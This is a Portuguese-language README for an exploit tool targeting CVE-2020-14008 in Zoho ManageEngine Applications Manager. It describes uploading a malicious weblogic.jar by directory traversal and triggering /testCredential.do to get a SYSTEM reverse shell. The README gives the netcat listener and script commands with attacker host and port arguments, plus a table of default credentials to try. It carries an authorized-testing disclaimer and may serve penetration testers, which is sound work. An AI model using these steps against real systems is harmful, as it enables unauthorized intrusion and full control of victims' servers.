
CVE-2020-14008 - ManageEngine Applications Manager RCE
Execução Remota de Código Autenticada via Upload Arbitrário de Arquivos no Zoho ManageEngine Applications Manager (versões <= 14720).
| Detalhe | Valor |
|---|---|
| CVE | CVE-2020-14008 |
| CVSS | 7.2 (Alto) |
| Tipo | RCE Autenticada / Upload Arbitrário de Arquivos |
| Produto | Zoho ManageEngine Applications Manager |
| Afetado | Versão 14720 e anteriores |
| Requisito | Credenciais de administrador válidas |
| Resultado | Reverse shell nível SYSTEM |
O exploit abusa do recurso de teste de credenciais do monitor Weblogic. Um administrador autenticado faz upload de um arquivo weblogic.jar malicioso para o caminho esperado da biblioteca Weblogic. Quando o teste de credenciais é acionado, o ManageEngine carrega weblogic.jndi.Environment do JAR enviado via JarLoader.loadClass() e newInstance(), executando código Java arbitrário.
javac e jar no PATH)nc (netcat) para capturar reverse shellpip3 install requests urllib3 lxml
nc -lvnp 1337
python3 cve-2020-14008.py <URL> <USERNAME> <PASSWORD> <LHOST> <LPORT>
# Básico
python3 cve-2020-14008.py https://192.168.100.2:8443 admin admin 192.168.100.3 1337
weblogic.jndi.Environment) contendo um reverse shell em weblogic.jarclasses/weblogic/version8/ via directory traversal (fallback: criar uma tarefa agendada para movê-lo)/testCredential.do, que carrega e instancia a classe maliciosa| Usuário | Senha |
|---|---|
| admin | admin |
| admin | password |
| administrator | administrator |
| guest | guest |
Esta ferramenta é fornecida apenas para testes de penetração autorizados e pesquisa em segurança. O uso não autorizado contra sistemas que você não possui ou sem permissão para testar é ilegal.
| Erro | Solução |
|---|
release version 7 not supported | Java 21+ abandonou o target Java 7. Script usa --release 8 |
FileNotFoundError: weblogic.jar | Falha na compilação do JAR. Verifique se javac e jar estão no PATH |
No valid response from used session | Credenciais inválidas |
Actionname not found | Falha na criação da tarefa, verifique as permissões de administrador |